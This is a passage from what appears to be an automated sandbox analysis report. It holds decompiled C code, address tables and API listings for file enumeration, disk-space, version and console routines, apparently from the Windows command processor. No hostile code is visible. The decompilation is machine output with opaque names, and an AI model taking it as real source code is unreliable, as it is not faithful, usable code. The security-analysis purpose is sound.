							 *_t97 = 0;
							_t80 = FindFirstFileW(_t77,  &_v604);
							_t47 = _v612;
							 *_t97 = _t47;
							if(_t80 == 0xffffffff) {
								_t97 = _t97 + 2;
								_t101 = _t97;
								goto L17;
							} else {
								FindClose(_t80);
								if(_v604.cAlternateFileName != 0) {
									if(_a4 != 0) {
										L23:
										_t53 =  &(_v604.cAlternateFileName);
										goto L12;
									} else {
										_t69 =  &(_v604.cAlternateFileName);
										__imp___wcsnicmp(_t69, _t101, _t97 - _t101 >> 1);
										_t108 = _t108 + 0xc;
										if(_t69 != 0) {
											goto L11;
										} else {
											_t71 =  &(_v604.cFileName);
											__imp___wcsicmp(_t71,  &(_v604.cAlternateFileName));
											if(_t71 == 0) {
												goto L11;
											} else {
												goto L23;
											}
										}
									}
									L14:
									_t83 = _t81 - _t91 >> 1;
									_t90 = _t83 - (_t97 - _t101 >> 1);
									_v608 = _t83;
									_t75 = _t75 + _t90;
									if(_t75 >= _v616) {
										goto L21;
									} else {
										if(_t90 > 0) {
											_t84 = _t97;
											_t102 = _t84 + 2;
											do {
												_t58 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t58 != _v624);
											_t103 = _t97 + _t90 * 2;
											memmove(_t103, _t97, 1 + (_t84 - _t102 >> 1) * 2);
											_t83 = _v608;
											_t108 = _t108 + 0xc;
											_t97 = _t103;
										}
										_t104 = _t83 + _t83;
										memcpy(_v632, _v620, _t104);
										_v632 = _v632 + _t104;
										_t108 = _t108 + 0xc;
										_t105 = _v632;
										_t90 = _v616 - (_t105 - _v628 >> 1);
										E002B1040(_t105, _v616 - (_t105 - _v628 >> 1), _t97);
										_t47 = _v616;
										_t101 = _t105 + 2;
										_t97 = _t101;
										L17:
										_t77 = _v628;
										_v632 = _t101;
										goto L6;
									}
									goto L8;
								} else {
									L11:
									_t53 =  &(_v604.cFileName);
								}
								L12:
								_t81 = _t53;
								_v620 = _t53;
								_t91 = _t81 + 2;
								do {
									_t54 =  *_t81;
									_t81 = _t81 + 2;
								} while (_t54 != _v624);
								goto L14;
							}
						} else {
							goto L6;
						}
						goto L8;
						L6:
						_t97 = _t97 + 2;
					} while (_t47 != 0);
					_t45 = 1;
				}
				L8:
				_pop(_t96);
				_pop(_t100);
				_pop(_t76);
				return E002B6FD0(_t45, _t76, _v8 ^ _t108, _t90, _t96, _t100);
			}












































                                              0x002b245c
                                              0x002b245c
                                              0x002b2464
                                              0x002b246a
                                              0x002b2471
                                              0x002b247a
                                              0x002b247c
                                              0x002b2483
                                              0x002b2487
                                              0x002b248b
                                              0x002b248e
                                              0x002b248e
                                              0x002b2491
                                              0x002b2494
                                              0x002b249b
                                              0x002b249f
                                              0x002b25d2
                                              0x002b25d2
                                              0x002b24a5
                                              0x002b24a5
                                              0x002b24a8
                                              0x002b24aa
                                              0x002b24ae
                                              0x002b24ae
                                              0x002b24b1
                                              0x002b24b8
                                              0x002b24e3
                                              0x002b24f2
                                              0x002b24f4
                                              0x002b24f8
                                              0x002b24fe
                                              0x002bd671
                                              0x002bd674
                                              0x00000000
                                              0x002b2504
                                              0x002b2505
                                              0x002b2514
                                              0x002b25a6
                                              0x002bd62e
                                              0x002bd62e
                                              0x00000000
                                              0x002b25ac
                                              0x002b25b3
                                              0x002b25bc
                                              0x002b25c2
                                              0x002b25c7
                                              0x00000000
                                              0x002b25cd
                                              0x002bd619
                                              0x002bd61e
                                              0x002bd628
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bd628
                                              0x002b25c7
                                              0x002b2534
                                              0x002b2538
                                              0x002b2540
                                              0x002b2542
                                              0x002b2546
                                              0x002b254c
                                              0x00000000
                                              0x002b2552
                                              0x002b2554
                                              0x002bd63a
                                              0x002bd63c
                                              0x002bd63f
                                              0x002bd63f
                                              0x002bd642
                                              0x002bd645
                                              0x002bd64e
                                              0x002bd65d
                                              0x002bd663
                                              0x002bd667
                                              0x002bd66a
                                              0x002bd66a
                                              0x002b255a
                                              0x002b2566
                                              0x002b256b
                                              0x002b256f
                                              0x002b2572
                                              0x002b2585
                                              0x002b2587
                                              0x002b258c
                                              0x002b2590
                                              0x002b2593
                                              0x002b2595
                                              0x002b2595
                                              0x002b2599
                                              0x00000000
                                              0x002b2599
                                              0x00000000
                                              0x002b251a
                                              0x002b251a
                                              0x002b251a
                                              0x002b251a
                                              0x002b251e
                                              0x002b251e
                                              0x002b2520
                                              0x002b2524
                                              0x002b2527
                                              0x002b2527
                                              0x002b252a
                                              0x002b252d
                                              0x00000000
                                              0x002b2527
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b24bf
                                              0x002b24bf
                                              0x002b24c2
                                              0x002b24c9
                                              0x002b24c9
                                              0x002b24ca
                                              0x002b24d1
                                              0x002b24d2
                                              0x002b24d3
                                              0x002b24de

                                              APIs
                                              • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 002B24EC
                                              • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002B2505
                                              • memcpy.MSVCRT ref: 002B2566
                                              • _wcsnicmp.MSVCRT ref: 002B25BC
                                              • _wcsicmp.MSVCRT ref: 002BD61E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                              • String ID:
                                              • API String ID: 242869866-0
                                              • Opcode ID: d9f91081fdfc506c01283b363f7588ad777825db1afd950aaea66b1124c71657
                                              • Instruction ID: b505610799058be2fdbc3d2fb81888fc7899f1e93df0af69cbd0199c838c92cc
                                              • Opcode Fuzzy Hash: d9f91081fdfc506c01283b363f7588ad777825db1afd950aaea66b1124c71657
                                              • Instruction Fuzzy Hash: B451DF75524352CBC724DF28D8485EBB7E9EFC8350F54492EE899C7240EB30D969CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CA0D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E002CA0D2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				intOrPtr _v560;
				union _ULARGE_INTEGER _v564;
				union _ULARGE_INTEGER _v572;
				union _ULARGE_INTEGER _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				WCHAR* _t51;
				char _t60;
				WCHAR* _t69;
				void* _t77;
				void* _t78;
				void* _t79;
				signed int _t81;

				_t76 = __edx;
				_t35 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t35 ^ _t81;
				_t79 = __edx;
				_v552 = _a8;
				_t78 = __ecx;
				E002AB6B9(__ecx);
				_v28 = 0;
				_v20 = 0x104;
				_t60 = 1;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					E002B0D89(_t76, _t79);
					_t51 = _v28;
					_t69 = _t51;
					if(_t51 == 0) {
						_t69 =  &_v548;
					}
					if( *_t69 != 0 && _t69[1] == 0x3a && _t69[2] == 0) {
						E002B0CF2(_t76, "\\");
						_t51 = _v28;
					}
					_v560 = 0;
					_v564.LowPart = 0;
					if(_t51 == 0) {
						_t51 =  &_v548;
					}
					GetDiskFreeSpaceExW(_t51,  &_v564,  &_v580,  &_v572);
					_t77 = 6;
					E002C7A11(_t78, _t77);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t76 =  &_v564;
					E002CAC75(_a4,  &_v564, 0xe, _t54, _v20);
					_t79 = _v28;
					if(_t79 == 0) {
						_t79 =  &_v548;
					}
					E002B274C(0x2e3d00, 0x104, L"%5lu", _v552);
					_push(_t79);
					_t60 = E002C7C83(0x2e3d00, _t76, _t78, 0x2379, 2, 0x2e3d00);
				}
				__imp__??_V@YAXPAX@Z();
				return E002B6FD0(_t60, _t60, _v8 ^ _t81, _t76, _t78, _t79, _v28);
			}
























                                              0x002ca0d2
                                              0x002ca0dd
                                              0x002ca0e4
                                              0x002ca0ed
                                              0x002ca0ef
                                              0x002ca0f5
                                              0x002ca0f7
                                              0x002ca105
                                              0x002ca110
                                              0x002ca113
                                              0x002ca115
                                              0x002ca118
                                              0x002ca141
                                              0x002ca14e
                                              0x002ca153
                                              0x002ca156
                                              0x002ca15a
                                              0x002ca15c
                                              0x002ca15c
                                              0x002ca167
                                              0x002ca181
                                              0x002ca186
                                              0x002ca186
                                              0x002ca189
                                              0x002ca18f
                                              0x002ca197
                                              0x002ca199
                                              0x002ca199
                                              0x002ca1b5
                                              0x002ca1bd
                                              0x002ca1c0
                                              0x002ca1c5
                                              0x002ca1ca
                                              0x002ca1cc
                                              0x002ca1cc
                                              0x002ca1d8
                                              0x002ca1e1
                                              0x002ca1e6
                                              0x002ca1eb
                                              0x002ca1ed
                                              0x002ca1ed
                                              0x002ca209
                                              0x002ca20e
                                              0x002ca220
                                              0x002ca220
                                              0x002ca225
                                              0x002ca23e

                                              APIs
                                              • memset.MSVCRT ref: 002CA118
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 002CA1B5
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CA225
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$DiskFreeSpace
                                              • String ID: %5lu
                                              • API String ID: 2448137811-2100233843
                                              • Opcode ID: e49a9918c74dbab75d9310f55d30d86ac1c61b96cea98adab600c19bd311877f
                                              • Instruction ID: 586ccf45862fdb6fd3b2249c09fc308bcd5da5ac6ecb60084a3c290bc93f9ea2
                                              • Opcode Fuzzy Hash: e49a9918c74dbab75d9310f55d30d86ac1c61b96cea98adab600c19bd311877f
                                              • Instruction Fuzzy Hash: 6F417171A10219ABDB25DFA4DC89FEEB7B8EF08344F04019DA909A7141EA709F95CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B6FE3, Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002B7119,002A1000), ref: 002B6FEA
                                              • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(002B7119,?,002B7119,002A1000), ref: 002B6FF3
                                              • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,002B7119,002A1000), ref: 002B6FFE
                                              • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,002B7119,002A1000), ref: 002B7005
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                              • String ID:
                                              • API String ID: 3231755760-0
                                              • Opcode ID: 874c339c7d6c6f5afdc392fbaf0f376e1fe1c9d6a2feffc0aec761a6deffc92f
                                              • Instruction ID: 6cfd5e8ccfb9249447a037c624311852badbe6e377dfe5b29ae1a020afd96278
                                              • Opcode Fuzzy Hash: 874c339c7d6c6f5afdc392fbaf0f376e1fe1c9d6a2feffc0aec761a6deffc92f
                                              • Instruction Fuzzy Hash: 23D0C9721C0184BBCF102BE2FC8CA893E28EB84312F444402F709CA020CA314491CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C31DC, Relevance: 4.8, APIs: 3, Instructions: 274fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,002A250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002C3362
                                              • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 002C34BF
                                              • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 002C34D6
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: e615bbad137801c3719a6599f5d27523beaefc6c7e284d450aecfaf569c7011f
                                              • Instruction ID: 7f4aa6b9808db91c3c12e0814e48029ecae3e936890910d8a161f6f490efccf4
                                              • Opcode Fuzzy Hash: e615bbad137801c3719a6599f5d27523beaefc6c7e284d450aecfaf569c7011f
                                              • Instruction Fuzzy Hash: A291D7357242028BCB29EF28C851A6BB7E2FF98354B458E2DE845C7350EB71DE55CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A443C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002C731D,?,?,?,?,?), ref: 002A4442
                                                • Part of subcall function 002A4476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 002A449A
                                                • Part of subcall function 002A4476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 002A44BE
                                                • Part of subcall function 002A4476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 002A44C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CloseOpenQueryValueVersion
                                              • String ID: %d.%d.%05d.%d
                                              • API String ID: 2996790148-3457777122
                                              • Opcode ID: 7e15fb448fd63e020bfd8e727ec4528d482209a936e75b9348ae23c7793692ea
                                              • Instruction ID: ce2323c8896cbbb53df45e049a674610f55d4783b0914db71faff3c528c61298
                                              • Opcode Fuzzy Hash: 7e15fb448fd63e020bfd8e727ec4528d482209a936e75b9348ae23c7793692ea
                                              • Instruction Fuzzy Hash: 86D02BB1B6022037D614256A1C9EE7B508DC6C9361B44412FBD01962C2DCE89C3441B4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B3D27, Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 299memorylibraryloaderCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E002B3D27(void* __ebx, intOrPtr* __ecx) {
				signed int _v8;
				char _v72;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
				void* _v100;
				intOrPtr* _v104;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				intOrPtr _t57;
				WCHAR* _t59;
				int _t60;
				WCHAR* _t72;
				struct HINSTANCE__* _t76;
				intOrPtr* _t80;
				int _t88;
				WCHAR* _t89;
				WCHAR* _t91;
				void* _t95;
				void* _t98;
				short _t100;
				intOrPtr* _t109;
				WCHAR* _t113;
				short _t122;
				short* _t125;
				void* _t129;
				long _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;

				_t95 = __ebx;
				_t26 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t26 ^ _t138;
				_t133 = __ecx;
				_v104 = __ecx;
				 *0x2d3858 = 0x2d385c;
				InitializeCriticalSection(0x2d385c);
				EnterCriticalSection( *0x2d3858);
				_t131 = 0;
				 *0x2cd544 = 0;
				LeaveCriticalSection( *0x2d3858);
				_t29 = SetConsoleCtrlHandler(E002C6D90, 1);
				__imp___get_osfhandle(0x2d387c);
				_t30 = GetConsoleMode(_t29, 1);
				__imp___get_osfhandle(0, 0x2d3878);
				_pop(_t98);
				GetConsoleMode(_t30, ??);
				E002B06C0(_t98);
				 *0x2d3834 = E002B3AAE();
				 *0x2d3830 = E002B3B2C(_t98);
				E002B41DD(_t133);
				_t36 = GetCommandLineW();
				_t3 =  &(_t36[1]); // 0x2
				_t125 = _t3;
				do {
					_t100 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t100 != 0);
				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
					_push(0);
					E002AC5A2(0x2000);
					_t103 = 0x400023df;
					do {
						__eflags = E002B4B60(__eflags, 0);
					} while (__eflags == 0);
					L21:
					exit(1);
					L22:
					_push(_t131);
					E002AC5A2(_t103);
					_t103 = 0x2374;
					do {
						__eflags = E002B4B60(__eflags, _t131);
					} while (__eflags == 0);
					goto L21;
				}
				_t103 =  &_v100;
				E002B2A7C( &_v100, 0x2000, _t144);
				_t134 = _v100;
				if(_t134 == 0) {
					goto L22;
				}
				E002B1040(_t134, 0x2000, GetCommandLineW());
				if(E002B0C70(0x2e3ab0, ((0 |  *0x2e3cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_push(0);
					E002AC5A2(0x2e3ab0);
					_t103 = 0x2374;
					do {
						__eflags = E002B4B60(__eflags, 0);
					} while (__eflags == 0);
					goto L21;
				}
				_t108 =  *0x2e3cb8;
				if( *0x2e3cb8 == 0) {
					_t108 = 0x2e3ab0;
				}
				E002B36CB(_t95, _t108,  *0x2e3cc0, _t131);
				E002ACEA9();
				_t109 = _t134;
				_t129 = _t109 + 2;
				do {
					_t57 =  *_t109;
					_t109 = _t109 + 2;
					_t149 = _t57 - _t131;
				} while (_t57 != _t131);
				E002AD3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
				_t59 =  *0x2e3cb8;
				_t130 = 0x2e3ab0;
				_t113 = _t59;
				if(_t59 == 0) {
					_t113 = 0x2e3ab0;
				}
				_t135 = 0x5c;
				_t136 = _v100;
				if( *_t113 == _t135) {
					_t103 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						_t103 = _t130;
					}
					_t137 = 0x5c;
					__eflags = _t103[1] - _t137;
					_t136 = _v100;
					if(_t103[1] != _t137) {
						goto L10;
					} else {
						__eflags =  *0x2e8528;
						if( *0x2e8528 != 0) {
							goto L10;
						}
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = _t130;
						}
						E002AC5A2(_t103, 0x400023c8, 1, _t59);
						_t91 =  *0x2e3cb8;
						_t139 = _t139 + 0xc;
						__eflags = _t91;
						if(_t91 == 0) {
							_t91 = 0x2e3ab0;
						}
						__eflags = GetWindowsDirectoryW(_t91,  *0x2e3cc0);
						if(__eflags == 0) {
							do {
								__eflags = E002B4B60(__eflags, _t131);
							} while (__eflags == 0);
							goto L21;
						} else {
							_t124 =  *0x2e3cb8;
							__eflags =  *0x2e3cb8;
							if(__eflags == 0) {
								_t124 = 0x2e3ab0;
							}
							_t130 = 0;
							E002B33FC(_t95, _t124, 0, _t131, _t136, __eflags);
							goto L10;
						}
					}
				} else {
					L10:
					_t60 = GetConsoleOutputCP();
					 *0x2d3854 = _t60;
					GetCPInfo(_t60, 0x2d3840);
					E002B3F80();
					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
					 *0x2d3874 = _t64;
					if(_t64 != 0 && _t64 == 0) {
						_t64 =  *0x2d3874;
						 *( *0x2d3874) = 0;
					}
					if( *0x2e3ccc == _t131) {
						__eflags = E002B269C(_t64);
						if(__eflags == 0) {
							goto L13;
						}
						__eflags =  *0x2cd5a0 - _t131; // 0x0
						if(__eflags != 0) {
							L51:
							_t122 =  *0x2cd5a0; // 0x0
							E002C7DF1(_t122, _t136);
							goto L13;
						}
						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
						__eflags = _t88;
						if(_t88 == 0) {
							_t89 =  *0x2cd5a0; // 0x0
						} else {
							_t89 = _v96.wAttributes;
							 *0x2cd5a0 = _t89;
						}
						__eflags = _t89;
						if(__eflags == 0) {
							goto L13;
						} else {
							goto L51;
						}
					} else {
						L13:
						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
							_v100 = E002C6456(__eflags);
							E002A443C( &_v72);
							E002AC108( &_v72, 0x2350, 1,  &_v72);
							E002B25D9(L"\r\n");
							_t72 = _v100;
							__eflags = _t72;
							if(_t72 == 0) {
								_push(_t131);
								_push(8);
								E002AC5A2( &_v72);
							} else {
								_push(_t72);
								E002B25D9(L"%s");
								E002B25D9(L"\r\n");
							}
							GlobalFree(_v100);
						}
						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
						 *0x2cd0d0 = _t76;
						 *0x2d388c = GetProcAddress(_t76, "CopyFileExW");
						GetProcAddress( *0x2cd0d0, "IsDebuggerPresent");
						 *0x2d3888 = GetProcAddress( *0x2cd0d0, "SetConsoleInputExeNameW");
						_t80 = _v104;
						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
							_t131 = 1;
						}
						__imp__??_V@YAXPAX@Z();
						return E002B6FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
					}
				}
			}








































                                              0x002b3d27
                                              0x002b3d2f
                                              0x002b3d36
                                              0x002b3d3f
                                              0x002b3d43
                                              0x002b3d46
                                              0x002b3d4b
                                              0x002b3d57
                                              0x002b3d63
                                              0x002b3d65
                                              0x002b3d6b
                                              0x002b3d78
                                              0x002b3d85
                                              0x002b3d8d
                                              0x002b3d99
                                              0x002b3d9f
                                              0x002b3da1
                                              0x002b3da7
                                              0x002b3db1
                                              0x002b3dbd
                                              0x002b3dc2
                                              0x002b3dc7
                                              0x002b3dcd
                                              0x002b3dcd
                                              0x002b3dd0
                                              0x002b3dd0
                                              0x002b3dd3
                                              0x002b3dd6
                                              0x002b3de5
                                              0x002b3de7
                                              0x002be043
                                              0x002be049
                                              0x002be04f
                                              0x002be050
                                              0x002be056
                                              0x002be056
                                              0x002be05a
                                              0x002be05c
                                              0x002be062
                                              0x002be062
                                              0x002be068
                                              0x002be06e
                                              0x002be06f
                                              0x002be075
                                              0x002be075
                                              0x00000000
                                              0x002be079
                                              0x002b3def
                                              0x002b3df2
                                              0x002b3df7
                                              0x002b3dfc
                                              0x00000000
                                              0x00000000
                                              0x002b3e10
                                              0x002b3e38
                                              0x002be07b
                                              0x002be081
                                              0x002be087
                                              0x002be088
                                              0x002be08e
                                              0x002be08e
                                              0x00000000
                                              0x002be092
                                              0x002b3e3e
                                              0x002b3e46
                                              0x002be094
                                              0x002be094
                                              0x002b3e53
                                              0x002b3e58
                                              0x002b3e5d
                                              0x002b3e5f
                                              0x002b3e62
                                              0x002b3e62
                                              0x002b3e65
                                              0x002b3e68
                                              0x002b3e68
                                              0x002b3e76
                                              0x002b3e7b
                                              0x002b3e80
                                              0x002b3e85
                                              0x002b3e89
                                              0x002be09e
                                              0x002be09e
                                              0x002b3e91
                                              0x002b3e95
                                              0x002b3e98
                                              0x002be0a5
                                              0x002be0a7
                                              0x002be0a9
                                              0x002be0ab
                                              0x002be0ab
                                              0x002be0af
                                              0x002be0b0
                                              0x002be0b4
                                              0x002be0b7
                                              0x00000000
                                              0x002be0bd
                                              0x002be0bd
                                              0x002be0c4
                                              0x00000000
                                              0x00000000
                                              0x002be0ca
                                              0x002be0cc
                                              0x002be0ce
                                              0x002be0ce
                                              0x002be0d8
                                              0x002be0dd
                                              0x002be0e2
                                              0x002be0e5
                                              0x002be0e7
                                              0x002be0e9
                                              0x002be0e9
                                              0x002be0fb
                                              0x002be0fd
                                              0x002be11a
                                              0x002be120
                                              0x002be120
                                              0x00000000
                                              0x002be0ff
                                              0x002be0ff
                                              0x002be105
                                              0x002be107
                                              0x002be109
                                              0x002be109
                                              0x002be10e
                                              0x002be110
                                              0x00000000
                                              0x002be110
                                              0x002be0fd
                                              0x002b3e9e
                                              0x002b3e9e
                                              0x002b3e9e
                                              0x002b3eaa
                                              0x002b3eaf
                                              0x002b3eb5
                                              0x002b3ec7
                                              0x002b3ecd
                                              0x002b3ed4
                                              0x002be129
                                              0x002be130
                                              0x002be130
                                              0x002b3ef0
                                              0x002be140
                                              0x002be142
                                              0x00000000
                                              0x00000000
                                              0x002be148
                                              0x002be14f
                                              0x002be183
                                              0x002be183
                                              0x002be189
                                              0x00000000
                                              0x002be189
                                              0x002be15e
                                              0x002be164
                                              0x002be166
                                              0x002be174
                                              0x002be168
                                              0x002be168
                                              0x002be16c
                                              0x002be16c
                                              0x002be17a
                                              0x002be17d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b3ef6
                                              0x002b3ef6
                                              0x002b3efc
                                              0x002be19b
                                              0x002be19e
                                              0x002be1ae
                                              0x002be1b8
                                              0x002be1bd
                                              0x002be1c3
                                              0x002be1c5
                                              0x002be1e1
                                              0x002be1e2
                                              0x002be1e4
                                              0x002be1c7
                                              0x002be1c7
                                              0x002be1cd
                                              0x002be1d7
                                              0x002be1dc
                                              0x002be1ef
                                              0x002be1ef
                                              0x002b3f07
                                              0x002b3f13
                                              0x002b3f29
                                              0x002b3f2e
                                              0x002b3f45
                                              0x002b3f4a
                                              0x002b3f4f
                                              0x002b3f5d
                                              0x002b3f5d
                                              0x002b3f5f
                                              0x002b3f77
                                              0x002b3f77
                                              0x002b3ef0

                                              APIs
                                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(002D385C), ref: 002B3D4B
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002B3D57
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002B3D6B
                                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(002C6D90,00000001), ref: 002B3D78
                                              • _get_osfhandle.MSVCRT ref: 002B3D85
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B3D8D
                                              • _get_osfhandle.MSVCRT ref: 002B3D99
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B3DA1
                                                • Part of subcall function 002B06C0: _get_osfhandle.MSVCRT ref: 002B06D8
                                                • Part of subcall function 002B06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,002C38A5), ref: 002B06E2
                                                • Part of subcall function 002B06C0: _get_osfhandle.MSVCRT ref: 002B06EF
                                                • Part of subcall function 002B06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B06F9
                                                • Part of subcall function 002B06C0: _get_osfhandle.MSVCRT ref: 002B071E
                                                • Part of subcall function 002B06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B0728
                                                • Part of subcall function 002B06C0: _get_osfhandle.MSVCRT ref: 002B0750
                                                • Part of subcall function 002B06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B075A
                                                • Part of subcall function 002B3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,002B3A9F), ref: 002B3AB2
                                                • Part of subcall function 002B3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 002B3ACD
                                                • Part of subcall function 002B3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002B3AD4
                                                • Part of subcall function 002B3AAE: memcpy.MSVCRT ref: 002B3AE3
                                                • Part of subcall function 002B3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 002B3AEC
                                                • Part of subcall function 002B3B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,002B3DBB), ref: 002B3B33
                                                • Part of subcall function 002B3B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002B3DBB), ref: 002B3B3A
                                                • Part of subcall function 002B41DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 002B423D
